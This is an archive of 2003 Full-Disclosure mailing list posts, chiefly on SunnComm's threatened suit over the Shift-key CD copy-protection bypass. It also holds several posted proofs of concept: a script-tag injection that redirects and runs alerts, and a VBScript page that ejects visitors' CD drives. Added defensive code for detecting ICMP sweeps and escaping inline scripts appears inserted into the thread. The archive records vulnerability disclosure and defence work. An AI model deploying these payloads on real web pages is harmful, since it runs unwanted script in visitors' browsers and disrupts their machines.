Security Engineer - Technical Services
James Madison University
Please R.U.N.S.A.F.E.
http://www.jmu.edu/computing/runsafe
RE: [Full-Disclosure] Student faces suit over key to CD locks
> [SNIP]
> Not only that, but by announcing they are going to sue, they hype the press up so the general public knows about it as well. As it was, the security community and interested geeks were probably the only ones who would have noticed the issue, but now the whole world knows. Can you imagine Johnny Slowpoke, who knows little to nothing about computers, reading the article and saying, "Honey, look at this. Some company made copy protection for CDs that was so lame that all you have to do is hold down the shift key to bypass it. Can you imagine that? How stupid is that? And now they're suing the student who pointed it out. What a bunch of dorks!"

Naw, most non-techies are going to spend a week trying to locate the 'shift' key, after they finally locate the anykey. This story and suit is going to make its waves in the techie circles, but will most likely not get a lot of real play in the real world.

Thanks,

Ron DuFresne
~~
"Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.
RE: [Full-Disclosure] Student faces suit over key to CD locks
Below is a comment from a colleague of mine:

"Personally, I have autorun disabled on my laptop anyway so it'd never get installed, but I wonder if it pops up a dialog to ask you if you want this intrusive device driver installed on your system. It's clearly malicious code, since it limits the capabilities of your PC. I wonder if you could sue them for hacking your computer?"

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Schmehl, Paul L
Sent: 10 October 2003 15:25
Cc: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Student faces suit over key to CD locks

> -Original Message-
> From: Johan Denoyer [mailto:[EMAIL PROTECTED]
> Sent: Friday, October 10, 2003 1:49 AM
> To: Richard M. Smith
> Cc: [EMAIL PROTECTED]
> Subject: Re: [Full-Disclosure] Student faces suit over key to CD locks
>
> > It's funny as how companies are running crazy. Throwing lawsuits at anyone that proves that they are complete idiots!
>
> Not only that, but by announcing they are going to sue, they hype the press up so the general public knows about it as well. As it was, the security community and interested geeks were probably the only ones who would have noticed the issue, but now the whole world knows. Can you imagine Johnny Slowpoke, who knows little to nothing about computers, reading the article and saying, "Honey, look at this. Some company made copy protection for CDs that was so lame that all you have to do is hold down the shift key to bypass it. Can you imagine that? How stupid is that? And now they're suing the student who pointed it out. What a bunch of dorks!"
>
> Paul Schmehl ([EMAIL PROTECTED])
> Adjunct Information Security Officer
> The University of Texas at Dallas
> AVIEN Founding Member
> http://www.utdallas.edu/~pauls/
Re: [Full-Disclosure] Student faces suit over key to CD locks
On Fri, 10 Oct 2003 09:25:16 CDT, Schmehl, Paul L said:

> Not only that, but by announcing they are going to sue, they hype the press up so the general public knows about it as well. As it was, the security community and interested geeks were probably the only ones who would have noticed the issue, but now the whole world knows. Can you imagine Johnny Slowpoke, who knows little to nothing about computers, reading the article and saying, "Honey, look at this. Some company made copy protection for CDs that was so lame that all you have to do is hold down the shift key to bypass it. Can you imagine that? How stupid is that? And now they're suing the student who pointed it out. What a bunch of dorks!"

Been there, done that, some people don't learn: Adobe. rot-13. Some poor guy from Moscow.
Re: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m
On Fri, Oct 10, 2003 at 10:19:03AM -0400, Jonathan A. Zdziarski said:

> I'm not a legal expert, but IIRC, Brown vs. Rural Telephone Company ruled that it was not a violation of any copyright to publish information that belonged to another company... although the issues are

You missed the passage of new copyright law, i.e. the DMCA.

--
Shawn McMahon      | Let every nation know, whether it wishes us well or ill,
EIV Consulting     | that we shall pay any price, bear any burden, meet any
UNIX and Linux     | hardship, support any friend, oppose any foe, to assure
http://www.eiv.com | the survival and the success of liberty. - JFK
Re: [Full-Disclosure] RE: Increased TCP 139 Activity
Choe.Sung Cont. PACAF CSS/SCHP wrote:

Ron Dufresne wrote:
If this is indeed the case, the ping sweep will all be packets of 92 byte, these are windows packets, and the recent rpcdcom sploits are the culprit.

ICMP packets 92-bytes in size (72 bytes + 20 bytes for header) are usually due to a welchia infected host trying to propagate. It is not a rpcdcom exploit.

I believe Windows `tracert' program uses 92 byte ICMP packets.

V/r,
Sung J. Choe
PACAF CSS/SCHP, PACAF NOSC
Information Assurance Analyst
DSN: 315-449-4317, Comm: 808-449-4317
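As an added example (not from anyone in this thread), here is the detection heuristic the exchange above implies, run over constructed flow records: a source sending 92-byte ICMP echo requests to many distinct destinations is the sweep behaviour attributed to Welchia, while the same packet size aimed at a single destination, as tracert produces, is left alone. The record format, the sample data, the function names and the threshold are my own assumptions.

```javascript
// Added example, not from the thread: flag 92-byte ICMP echo-request sweeps
// (many distinct destinations from one source) while ignoring a tracert-style
// burst of the same size to a single destination. Record format, sample
// data and thresholds are assumptions of mine.

// One constructed record per packet: epoch, src, dst, proto, icmp type,
// total IP length, ttl. 92 bytes = 20 IP + 8 ICMP + 64 bytes of payload.
// 10.1.1.5 sweeps a /24, 10.1.1.9 runs a tracert (TTL 1..4, one target),
// 10.1.1.20 sends ordinary 60-byte pings, 10.1.2.1 sends an echo reply.
const SAMPLE_LOG = `
1065800001 10.1.1.5 10.1.2.1 icmp 8 92 128
1065800001 10.1.1.5 10.1.2.2 icmp 8 92 128
1065800001 10.1.1.5 10.1.2.3 icmp 8 92 128
1065800002 10.1.1.5 10.1.2.4 icmp 8 92 128
1065800002 10.1.1.5 10.1.2.5 icmp 8 92 128
1065800002 10.1.1.5 10.1.2.6 icmp 8 92 128
1065800003 10.1.1.5 10.1.2.7 icmp 8 92 128
1065800003 10.1.1.5 10.1.2.8 icmp 8 92 128
1065800003 10.1.1.5 10.1.2.9 icmp 8 92 128
1065800004 10.1.1.5 10.1.2.10 icmp 8 92 128
1065800005 10.1.1.9 192.0.2.10 icmp 8 92 1
1065800005 10.1.1.9 192.0.2.10 icmp 8 92 2
1065800006 10.1.1.9 192.0.2.10 icmp 8 92 3
1065800006 10.1.1.9 192.0.2.10 icmp 8 92 4
1065800007 10.1.1.20 10.1.3.1 icmp 8 60 64
1065800007 10.1.1.20 10.1.3.2 icmp 8 60 64
1065800008 10.1.2.1 10.1.1.5 icmp 0 92 128
`;

// Parse the whitespace-separated records into objects.
function parseRecords(text) {
  return text.trim().split('\n').map(line => {
    const [epoch, src, dst, proto, type, len, ttl] = line.trim().split(/\s+/);
    return { epoch: Number(epoch), src, dst, proto, type: Number(type),
             len: Number(len), ttl: Number(ttl) };
  });
}

// Return one entry per source whose echo requests of the given size reached
// at least minDistinctDst distinct destinations, largest fan-out first.
// Echo replies (type 0) and other packet sizes are ignored, so a host that
// merely answers a sweep is not reported.
function findIcmpSweeps(records, { len = 92, minDistinctDst = 8 } = {}) {
  const bySrc = new Map();
  for (const r of records) {
    if (r.proto !== 'icmp' || r.type !== 8 || r.len !== len) continue;
    let s = bySrc.get(r.src);
    if (!s) {
      s = { src: r.src, dsts: new Set(), packets: 0 };
      bySrc.set(r.src, s);
    }
    s.dsts.add(r.dst);
    s.packets += 1;
  }
  return [...bySrc.values()]
    .filter(s => s.dsts.size >= minDistinctDst)
    .map(s => ({ src: s.src, distinctDst: s.dsts.size, packets: s.packets }))
    .sort((a, b) => b.distinctDst - a.distinctDst);
}

const sweeps = findIcmpSweeps(parseRecords(SAMPLE_LOG));
console.log(sweeps); // → [ { src: '10.1.1.5', distinctDst: 10, packets: 10 } ]
```

Lowering minDistinctDst to 1 also reports the tracert host, which is the false positive the thread is warning about; the fan-out threshold is what separates the two.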
RE: [Full-Disclosure] Student faces suit over key to CD locks
On Fri, 10 Oct 2003, Jonathan Grotegut wrote:

> Correct me if I'm wrong but how is holding down the shift key distributing tools for breaking through digital piracy safeguards? Shouldn't the keyboard manufacturers be sued since they are the ones that made the shift key and distributed it?

No, they shouldn't - the 'tool' in question isn't a physical item (like a hammer or a keyboard), it's the procedure of holding down the shift key. Distributing this idea is what SunnComm have issues with - although any company worth their salt should not be relying on a 'feature' such as autorun that Microsoft themselves publish methods for disabling through TweakUI and careful editing of the registry.

I hope that this lawsuit gets thrown out at the first opportunity. And then Sony/Phillips go after SunnComm for using the 'Compact Disc' trademark erroneously.

--
Steven Harrison
F Invalid file name, 0:1
RE: [Full-Disclosure] Student faces suit over key to CD locks
At 10:06 AM 10/10/03 -0500, Ron DuFresne wrote:

> This story and suit is going to make its waves in the techie circles, but will most likely not get a lot of real play in the real world.

http://www.dailyprincetonian.com/archives/2003/10/10/news/8797.shtml

They dropped the suit later in the day; I don't think they have the stomach for the kind of battle that would probably have ensued.

m5x
RE: [Full-Disclosure] Student faces suit over key to CD locks
For the DMCA to apply, a copy-protection scheme must be effective. Given that the SunnComm technology doesn't work on a Windows system where CD auto-play has been turned off, I would assume that in court they will have a tough time convincing a judge or a jury that their technology meets the effectiveness requirement of the DMCA. Turning off CD auto-play is a good idea from a security standpoint and has nothing to do with circumventing copy-protection schemes.

Here's the wording of the DMCA:

http://thomas.loc.gov/cgi-bin/query/F?c105:1:./temp/~c105Ate0xB:e11962

Sec. 1201. Circumvention of copyright protection systems

`(a) VIOLATIONS REGARDING CIRCUMVENTION OF TECHNOLOGICAL MEASURES-

(1)(A) No person shall circumvent a technological measure that *effectively* controls access to a work protected under this title.

`(2) No person shall manufacture, import, offer to the public, provide, or otherwise traffic in any technology, product, service, device, component, or part thereof, that--

  `(A) is primarily designed or produced for the purpose of circumventing a technological measure that effectively controls access to a work protected under this title;

  `(B) has only limited commercially significant purpose or use other than to circumvent a technological measure that effectively controls access to a work protected under this title; or

  `(C) is marketed by that person or another acting in concert with that person with that person's knowledge for use in circumventing a technological measure that effectively controls access to a work protected under this title.

`(3) As used in this subsection--

  `(A) to `circumvent a technological measure' means to descramble a scrambled work, to decrypt an encrypted work, or otherwise to avoid, bypass, remove, deactivate, or impair a technological measure, without the authority of the copyright owner; and

  `(B) a technological measure `effectively controls access to a work' if the measure, in the ordinary course of its operation, requires the application of information, or a process or a treatment, with the authority of the copyright owner, to gain access to the work.

Richard

PS. IANAL, YMMV, etc.

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan A. Zdziarski
Sent: Friday, October 10, 2003 11:04 AM
To: Schmehl, Paul L
Cc: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Student faces suit over key to CD locks

> Does this mean they're going to attempt to sue Microsoft also, for publishing this feature in their Windows documentation? Or perhaps they'll take the RIAA's approach and sue anyone who uses the SHIFT key.
RE: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m
In order to install the software you have to accept their EULA which says it is installing software to access the media. Did you not read the article?

Mark Bassett
Network Administrator
World media company
Omaha.com
402-898-2079

-Original Message-
From: Nick Jacobsen [mailto:[EMAIL PROTECTED]
Sent: Thursday, October 09, 2003 6:40 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m

> it seems to me the perfect chance for a countersuit... cause at least as far as I know, most state's definition of computer crime would include installing software on a machine without the owner's permission or knowledge.. and since that is what SunnComm's protection is doing...
>
> Nick Jacobsen (Ethics)
> [EMAIL PROTECTED] mailto:[EMAIL PROTECTED]
Re: [Full-Disclosure] Student faces suit over key to CD locks
Looks like Sunncomm isn't among the folks incapable of learning:

http://www.p2pnet.net/article/8380

> Sunncomm responded with angry threats of legal action and lawsuits under the DMCA. But last night Sunncomm ceo Peter Jacobs said a successful lawsuit would do little to reverse the damage done by Halderman's disclosure and would probably hurt Sunncomm by making computer scientists think twice about researching copy-protection technology.

--
Shawn McMahon      | Let every nation know, whether it wishes us well or ill,
EIV Consulting     | that we shall pay any price, bear any burden, meet any
UNIX and Linux     | hardship, support any friend, oppose any foe, to assure
http://www.eiv.com | the survival and the success of liberty. - JFK
Re: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m
It seems SunnComm has reconsidered their position:
http://www.dailyprincetonian.com/archives/2003/10/10/news/8797.shtml

They claim they don't want to hurt research but I think they know they can't win.

--
Patrick Dolan
UNT Computing and Information Technology Center
PGP ID: E5571154
Primary key fingerprint: 5681 25E4 6BE6 298E 9CF0 6F8D B13B 2456 E557 1154
[Full-Disclosure] Local DoS in windows.
--- [Affected] ---
We have only tried it in windows Xp.

--- [Bug Details] ---
http://www.geocities.com/visitbipin/win_dos.jpg
The image is self explanatory...

--- [Description] ---
When you click any close, maximize or minimize button in windows Xp [no matter whether it's IE or a WordPad], surprisingly there is 100% CPU use at the instant and it continues until you release the button! Moreover, we've noticed if you continuously click the button for a long time [... not release it and hold ON] we've seen gradual/slow rise in page-file use too...!!!

--- [Conclusion] ---
Hell... local DoS! That could be used by employees working at different terminals. (O;

--- [Background Information] ---
This bug was originally discovered by hUNT3R, [myself] a member of 01 Security Submission. The vendor was notified via email.
http://www.ysgnet.com/hn

--- [I want a JOB/scholarship... anyone??? - hUNT3R] ---
Re: [Full-Disclosure] Student faces suit over key to CD locks
On Friday 10 October 2003 11:33, [EMAIL PROTECTED] wrote:

> Been there, done that, some people don't learn: Adobe. rot-13. Some poor guy from Moscow.

I concur, but the Princeton grad student that published the paper still has to defend himself in court -- which is both time consuming and costly to all. IMHO, they are just bullying him around, and that is deplorable.

Cheers,

Ken van Wyk
Re: [Full-Disclosure] Student faces suit over key to CD locks
[EMAIL PROTECTED] wrote:

> I hope that this lawsuit gets thrown out at the first opportunity. And then Sony/Phillips go after SunnComm for using the 'Compact Disc' trademark erroneously.

AFAIK, this doesn't break the CD standard. The disks are perfectly readable dual-session disks, just with nasty malware on them.
[Full-Disclosure] [A bug!] Whom to blame, the HTML interpreter or the JavaScript compiler?
--- [Effected] ---
All versions of OPERA, MOZILLA and INTERNET EXPLORER available up to this release DATE!

--- [Proof of concept] ---
We have made a small script. Check it out, http://www.cyberdude.com.np/javascript.htm

--- [Bug Details] ---

    <html>
    <body>
    <p>THIS IS hUNT3R aka: Bipin Gautam</p>
    <script>alert("<script>location.href='http://www.ysgnet.com';</script>")</script>
    </body>
    </html>

    <html>
    <body>
    <p>THIS IS hUNT3R aka: Bipin Gautam, exploit revised by Cyberdude</p>
    <script>
    document.write("<b>hUNTER Cyberdude</b></script><script>alert('it works 1'); alert('This works 2');
    </script>
    </body>
    </html>

--- [Description] ---
The browser is letting you compile some-thing inside the alert function. Well, it should show it anyway without compiling the script tag as it is inside the quotation. But surprisingly, the output is different! We found the JavaScript compiler choked when we use the script tag inside a function like alert(); this also proves to be true for the document.write() function. This means that this script is going to choke bad and you won't get any output but just the ); that's all.

This script is working. It's not that it is not working. It works in the starting script tag, but when the HTML parses the script tag inside the document.write it goes mad because nested scripting is not possible in HTML; the only nested tag in HTML must be the table tag, so in this script the HTML interpreter goes mad. But we can still insert the JavaScript in it. What we did was, we inserted the closing tag of JavaScript </script> first, closing the script tag that was opened already. After that we added the new starting script tag and wrote two alert tags now... So this is how we injected two alert tags in the JavaScript.

--- [Conclusion] ---
This proves injection of JavaScript inside a JavaScript, making it available to use the current variables and change some static values predefined and even access other functions without a problem. This was just a small demo; we use this simple script to just stop it from printing garbage on the screen.

--- [Background Information] ---
This bug was originally discovered by hUNT3R, [myself] a member of 01 Security Submission. I would like to thank my friend 'Cyberdude' for further exploring it and taking it to a new Level.
http://www.ysgnet.com/hn

---[I want a JOB/scholarship... anyone??? - hUNT3R]---
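As an added example (not from the post above or its replies), the following models the behaviour the post describes: the HTML parser, not the JavaScript engine, ends a script element at the first </script> it sees, whatever the JavaScript quoting around it. It then shows the escaping a page must apply before placing untrusted data inside an inline script so that the data cannot terminate the block. All function names and the sample string are my own assumptions.

```javascript
// Added example, not from the original post: a minimal model of the HTML
// tokenizer's "script data" state beside the escaping needed to embed
// untrusted data in an inline <script>. Names and sample input are mine.

// Inside <script>, the tokenizer scans raw text for the first "</script"
// (case-insensitive) and knows nothing about JavaScript strings or quotes.
// Returns the text the JavaScript engine will actually receive.
function scriptDataState(rawAfterOpenTag) {
  const m = /<\/script/i.exec(rawAfterOpenTag);
  return m ? rawAfterOpenTag.slice(0, m.index) : rawAfterOpenTag;
}

// Turn a value into a JavaScript literal that is safe inside script data.
// JSON.stringify yields a valid JS expression; the two replacements remove
// the only sequences the HTML parser reacts to in script data: "</" (ends
// the element) and "<!--" (opens a script-data comment). Inside a JS string
// "<\/" and "<\!--" decode to the original characters, so nothing is lost.
function toInlineScriptLiteral(value) {
  return JSON.stringify(value)
    .replace(/<\//g, '<\\/')
    .replace(/<!--/g, '<\\!--');
}

// What a template would emit for an inline <script> that hands data to
// the page's own code.
function buildInlineScript(untrusted) {
  return 'var payload = ' + toInlineScriptLiteral(untrusted) + ';';
}

// Stand-in for the JavaScript engine: evaluate a literal and return the
// value it denotes. String escapes are decoded here, not by the HTML parser.
function decodeAsJsEngine(literal) {
  return new Function('return (' + literal + ');')();
}

// Constructed sample input with the shape the post relies on: a closing
// script tag buried inside what is meant to be a string.
const hostile = "<b>x</b></script><script>alert('it works 1');";

// Naive embedding by concatenation. The HTML parser ends the block at the
// first </script>, the engine gets an unterminated string (a syntax error,
// so nothing runs), and the remainder becomes a brand-new script element.
const naive = "var payload = '" + hostile + "';";
const naiveSeen = scriptDataState(naive); // → "var payload = '<b>x</b>"

// Escaped embedding: no "</script" remains, the parser hands over the whole
// statement, and the engine decodes "<\/" back to "</".
const safe = buildInlineScript(hostile);
const safeSeen = scriptDataState(safe);   // → the whole statement, intact

console.log('naive, as seen by the engine  :', JSON.stringify(naiveSeen));
console.log('escaped, as seen by the engine:', JSON.stringify(safeSeen));
console.log('data round-trips unchanged    :',
            decodeAsJsEngine(toInlineScriptLiteral(hostile)) === hostile);
```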
Re: [Full-Disclosure] [A bug! update...] Whom to blame, the HTML interpreter or the JavaScript compiler?
bipin gautam wrote:

> --- [Effected] ---
> All versions of OPERA, MOZILLA and INTERNET EXPLORER available up to this release DATE!

Doesn't do squick with Moz 1.5b (non-RC) on WinXP

> http://www.ysgnet.com/hn
> ---[I want a JOB/scholarship... anyone??? - hUNT3R]---

I have some weeds in the backyard that are bugging the crap outta me. Is that all you got?

-jim
[Full-Disclosure] Sunncomm backs down from shift key prosecution
http://www.theinquirer.net/?article=12041
Re: [Full-Disclosure] [A bug!] Whom to blame, the HTML interpreter or the JavaScript compiler?
On Fri, 10 Oct 2003 10:38:59 -0700 (PDT) bipin gautam [EMAIL PROTECTED] wrote:

> --- [Effected] ---

It's spelled affected ;P

> All versions of OPERA, MOZILLA and INTERNET EXPLORER available up to this release DATE!

Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.5a) Gecko/20030813 Mozilla Firebird/0.6.1

Definitely _not_ vulnerable...
RE: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10 m
More importantly, if they do win and it is overturned on appeals due to first amendment rights then a portion of the DMCA has been ruled unconstitutional. I doubt they, their clients or others in their industry would want that.

James Cupps
Information Security Officer
Sappi Fine Paper North America
207-854-7065

-Original Message-
From: Patrick Dolan [mailto:[EMAIL PROTECTED]
Sent: Friday, October 10, 2003 1:45 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m

> It seems SunnComm has reconsidered their position:
> http://www.dailyprincetonian.com/archives/2003/10/10/news/8797.shtml
>
> They claim they don't want to hurt research but I think they know they can't win.
>
> --
> Patrick Dolan
> UNT Computing and Information Technology Center
> PGP ID: E5571154
> Primary key fingerprint: 5681 25E4 6BE6 298E 9CF0 6F8D B13B 2456 E557 1154
Re: [Full-Disclosure] [A bug!] Whom to blame, the HTML interpreter or the JavaScript compiler?
Dude, you need to read the reply(s) to your original post. If that doesn't clear it all up for you and you're really serious about your sploit, you should check out mine:

    <html>
    <body>
    <span style='display: none;' id='leetShellCode'>&#80;&#108;&#101;&#97;&#115;&#101; &#103;&#111; &#97;&#119;&#97;&#121;&#33;</span>
    <script language='JavaScript1.2' type='text/javascript'>
    alert(document.getElementById('leetShellCode').innerHTML);
    </script>
    </body>
    </html>

On Fri, Oct 10, 2003 at 10:38:59AM -0700, bipin gautam wrote:

> --- [Effected] ---
> All versions of OPERA, MOZILLA and INTERNET EXPLORER available up to this release DATE!
> [SNIP]
Re: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m
Patrick Dolan [EMAIL PROTECTED] wrote:

> It seems SunnComm has reconsidered their position:
> http://www.dailyprincetonian.com/archives/2003/10/10/news/8797.shtml

Good thing. Can you imagine the implications a successful Shift key suit might have on future use of the miscreant Delete key? Horrors.

Regards,
Mary Landesman
Antivirus About.com Guide
http://antivirus.about.com
Re: [Full-Disclosure] Student faces suit over key to CD locks
Yes, they will have to think twice about the QUALITY of the copy-protection they are creating. (as they should)

-DB

On Fri, 2003-10-10 at 09:53, Shawn McMahon wrote:
> Looks like Sunncomm isn't among the folks incapable of learning:
>
> http://www.p2pnet.net/article/8380
>
> > Sunncomm responded with angry threats of legal action and lawsuits under the DMCA. But last night Sunncomm ceo Peter Jacobs said a successful lawsuit would do little to reverse the damage done by Halderman's disclosure and would probably hurt Sunncomm by making computer scientists think twice about researching copy-protection technology.

--
---
Darren Bennett - CISSP
Sr. Systems Administrator/Manager
Science Applications International Corporation
Advanced Systems Development and Integration
---
[Full-Disclosure] Microsoft Outlines Security Plan (Balmer Blows Hard)
Microsoft Outlines Security Plan
Fri Oct 10, 1:00 AM ET
washingtonpost.com
By Mike Musgrove

^^ "I wish those people just would be quiet," he said of computer researchers who publish vulnerabilities in Microsoft's products. ^^

Microsoft chief executive Steven A. Ballmer said yesterday that there is "much, much, much" left to do to protect computer users from viruses, worms and other malicious software. He outlined new steps the company plans to take to address this problem -- while acknowledging that these changes can't solve it.

"There is no silver bullet," Ballmer said in a speech at the company's Worldwide Partner Conference in New Orleans. "Even if all the vulnerabilities were fixed tomorrow morning in all of the products, there's still 600 million computers . . . that wouldn't have all of these vulnerabilities patched."

Recent devastating software worms and viruses have earned Microsoft intense criticism, as well as a class-action lawsuit filed in Los Angeles Superior Court last week that accuses the company of not doing enough to guard the personal information of Windows users.

Ballmer described several changes to Microsoft's security strategy. He said the Redmond, Wash., company will issue security updates on a monthly schedule, except in emergency situations, to make it easier for users to keep their personal computers up to date. It will ship Windows with security precautions activated that are now left off -- for instance, a firewall program that stops Internet worms such as Blaster. He also said the company will release security-focused updates to Microsoft Windows XP and Windows Server 2003 in the first half of next year.

"Computer security is without question the number one priority for the company," Mike Nash, vice president of Microsoft's security business unit, said in a phone interview after Ballmer's speech. He added that employees from across the company had been pulled to work on security efforts.

Ballmer said that, since most virus and worm attacks come only after vulnerabilities have been disclosed by the company or by security researchers, Microsoft is working with computer-security firms to make sure that they do not announce vulnerabilities before Microsoft has designed a fix. "I wish those people just would be quiet," he said of computer researchers who publish vulnerabilities in Microsoft's products. "It would be best for the world. That's not going to happen, so we have to work in the right fashion with these security researchers."

But no matter how fast Microsoft pushes out patches, users still have to install them -- something Microsoft is trying to address with a new educational campaign that Ballmer also announced yesterday.

"I think people are taking computer security a bit more seriously; some of our clients are still cleaning up from the Blaster virus," said Josh Pennell, chief executive and founder of computer security firm IOActive Inc. "Computer security is almost like car insurance. Nobody wants it until their car gets totaled."

Jeff Jones, senior director of trustworthy computing at Microsoft, said earlier this week that his company had seen an increase in the numbers of users downloading security patches after an outbreak of viruses that began in August. "I hesitate to speculate on whether there is long-term learning going on there," he added.

Ken Dunham, director of malicious code at iDefense Inc., a computer security firm based in Reston, said Microsoft's plan to release only monthly updates may give hackers extended time to exploit a vulnerability before a patch is released.

Other security professionals noted the lack of specifics in Ballmer's speech. "There wasn't any detail to what kind of tools they will provide," said Richard Ku, product manager at Trend Micro Inc., a developer of anti-virus software.

"Announcements never secured anything," said Bruce Schneier, founder and chief technology officer of Counterpane Internet Security Inc. "The fact that some guy gets on stage and says a bunch of words does not make your computer secure."

Michael Frodyma, president of BooNet Inc., an Internet service provider based in Bethesda, said he worries about the unintended consequence of Microsoft's security patches. Some have disabled the computers of his customers -- who have then blamed his firm for the problem. "One is frightened of what's around the next corner with Microsoft," he said. "You wake up the next day and suddenly something isn't working."

--
Jeremiah Cornelius, CISSP, CCNA, MCSE+I
farm9 Information Security
email: [EMAIL PROTECTED]
Phone: 510.835.3276  mobile: 415.235.7689

"Be cheerful while you are alive" --Phathotep, 24th Century B.C.
Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
On Fri, Oct 10, 2003 at 03:34:04PM -0400, Brown, Bobby (US - Hermitage) wrote:
> For us that can not interpret the site, what more information can be provided.
> Bobby

FYI, the site is in Russian. Here are the steps for enlightening yourself:

1. Visit your favorite search engine.
2. Type the words "online translator russian" (without quotation marks) into the query field.
3. Visit one of the many free or paid translating services that are listed there.
4. Select your preferred language (English, I'd wager), enter the URL, and let the translator go to work.
5. Read the slightly stilted but informative result.

FWIW, entering that query into google and clicking "I'm feeling lucky" gives good results.

Good luck.

HTH,
petard

--
If your message really might be confidential, download my PGP key here: http://petard.freeshell.org/petard.asc and encrypt it. Otherwise, save bandwidth and lose the disclaimer.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re : [VERY] BAD news on RPC DCOM Exploit
as Alex said "This code work with *all security fixes*". It's very dangerous ...

http://www.k-otik.com/exploits/10.09.rpc2universal.c.php
http://www.k-otik.com/exploits/10.09.rpcunshell.asm.php

god bless dcom !

----- Original Message -----
From: 3APA3A [EMAIL PROTECTED]
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Friday, October 10, 2003 6:48 PM
Subject: Bad news on RPC DCOM vulnerability

> Dear [EMAIL PROTECTED],
>
> There are few bad news on RPC DCOM vulnerability:
>
> 1. Universal exploit for MS03-039 exists in-the-wild, PINK FLOYD is again actual.
>
> 2. It was reported by exploit author (and confirmed), Windows XP SP1 with all security fixes installed still vulnerable to variant of the same bug. Windows 2000/2003 was not tested. For a while only DoS exploit exists, but code execution is probably possible. Technical details are sent to Microsoft, waiting for confirmation.
>
> Dear ISPs. Please instruct your customers to use personal fireWALL in Windows XP.
>
> --
> http://www.security.nnov.ru
> ZARAZA / 3APA3A
> "You know my name - look up my number" (The Beatles)
RE: [Full-Disclosure] Ejecting CDs with VBScript ( Online Exploit )
I get "Permission Denied" scripting error:
Win 98, IE 6 SP1 all patches, Wmplayer 9.00.00.2980

Regards,
Brent

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Lorenzo Hernandez Garcia-Hierro
Sent: Friday, October 10, 2003 5:13 PM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Ejecting CDs with VBScript ( Online Exploit )

> Hi friends,
>
> I'm not very happy with this. I have done an online test for ejecting CDs in MS Internet Explorer and I have tested it in all the computers of my house, but I was surprised when I checked that the last version of MSIE allows the execution of the script in the following security zones:
>
> . LOCAL/INTRANET
> . REMOTE/INTERNET
>
> I tested it in default values and the exploit is executed; I edited the values and again it was executed.
>
> Am I discovering a new vulnerability in MS Internet Explorer? I'm not sure because there are lots of known holes in MSIE.
>
> Suggestions and help are completely welcome.
>
> The best regards,
>
> PS: This is the code of the exploit:
> ------------------------------------------
>     <SCRIPT LANGUAGE="VBSCRIPT">
>     rem ----------------------------------------
>     rem No Secure Root Group Security Research
>     rem Coder: Trulux / Lorenzo Hdez G-H
>     rem ----------------------------------------
>     rem http://www.nsrg-security.com
>     rem ----------------------------------------
>     rem - CREATE WINDOWS MEDIA PLAYER OBJECT
>     rem -
>     Set LARRYINTHEWILD = CreateObject("WMPlayer.OCX.7")
>     rem -
>     rem - SETTING SOME VARIABLES FOR EJECT CD UNITS
>     rem -
>     Set RIAAsaysBLAH = LARRYINTHEWILD.cdromCollection
>     rem -
>     rem - EJECTING ROUTINE (walk every CD-ROM unit the player knows about)
>     rem -
>     If RIAAsaysBLAH.Count >= 1 Then
>         For i = 0 To RIAAsaysBLAH.Count - 1
>             RIAAsaysBLAH.Item(i).Eject
>         Next ' cdrom
>     End If
>     rem - END
>     </SCRIPT>
> ------------------------------------------
> NOTE: I don't know if this is a known security hole; if this was discovered before, I'm sorry (and a little sad :-( ).
>
> You can test it online: http://test-zone.nsrg-security.com/browser/msie/cdrom
[Full-Disclosure] Signed e-mail vs. turning off HTML mail under XP
Today I had the pleasure of receiving a digitally signed e-mail on my newest machine, running XP Pro. Since it is intended for business use, and connected to the internet, I am about halfway hardening it. One of the things I did was turn off HTML e-mail in OE (6 SP1).

On receiving a digitally signed e-mail, I got OE asking me whether:

    Security Help
    Digitally Signed Message

    This message has been digitally signed by the sender.

    Signed e-mail from others allows you to verify the authenticity of a message -- that the message is from the supposed sender and that it has not been tampered with during transit. Signed mail messages are designated with the signed mail icon.

    Any problems with a signed message will be described in a Security Warning which may follow this one. If there are problems, you should consider that the message was tampered with or was not from the supposed sender.

    Don't show me this Help screen again.

    Continue

Alas, the Continue button was just text, just as the tick box to not show me this help screen again was not there. This means I'll have to re-enable HTML mail, and wait for the next signed mail to arrive to turn it off.

I wonder what will happen to messages that have been tampered with when I have turned off HTML mail? I will probably get a warning, but will not be able to go beyond that, since it is in ASCII and that does not (AFAIK) support nice buttons.

So in order to enable signed mail, I will have to enable HTML in my mail.

Have a nice day, ya'all
Yossarian
Re: [Full-Disclosure] Signed e-mail vs. turning off HTML mail under XP
> Alas, the Continue button was just text, just as the tick box to not show me this help screen again was not there. This means I'll have to re-enable HTML mail, and wait for the next signed mail to arrive to turn it off.
>
> I wonder what will happen to messages that have been tampered with when I have turned off HTML mail? I will probably get a warning, but will not be able to go beyond that, since it is in ASCII and that does not (AFAIK) support nice buttons.
>
> So in order to enable signed mail, I will have to enable HTML in my mail.

Good evening Yossarian,

